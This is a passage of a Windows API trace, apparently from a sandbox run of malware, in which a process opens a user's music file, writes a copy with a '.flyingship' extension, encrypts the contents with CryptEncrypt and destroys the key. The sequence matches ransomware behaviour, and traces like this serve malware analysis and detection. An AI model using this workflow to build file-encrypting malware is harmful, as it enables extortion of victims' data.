lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0180.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.866] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.866] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0180.866] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.866] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.866] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0180.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3-ch0vn.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.868] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.868] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.868] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.868] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.868] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3-ch0vn.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.872] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.872] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0180.872] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1318, lpOverlapped=0x0) returned 1 [0180.874] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0180.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.875] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.875] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0180.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.875] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0180.875] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.875] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0180.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.876] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0180.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.876] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2728, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2728*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0180.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.876] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.876] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.876] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.877] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.877] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.877] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1318, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1320) returned 1 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] CharLowerBuffW (in: lpsz="byte[4897]", cchLength=0xa | out: lpsz="byte[4897]") returned 0xa [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.878] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.878] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x903c78*, pdwDataLen=0x87e820*=0x1318, dwBufLen=0x1320 | out: pbData=0x903c78*, pdwDataLen=0x87e820*=0x1320) returned 1 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.878] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.878] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.879] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.879] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.908] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.909] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.909] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.909] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0180.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.909] CryptDestroyKey (hKey=0x90af98) returned 1 [0180.909] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.909] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.909] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.909] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.909] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.909] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.909] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.909] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.910] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.910] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.910] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.910] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.910] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.910] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0180.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.911] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.911] FreeLibrary (hLibModule=0x74f20000) returned 1 [0180.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.911] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.912] 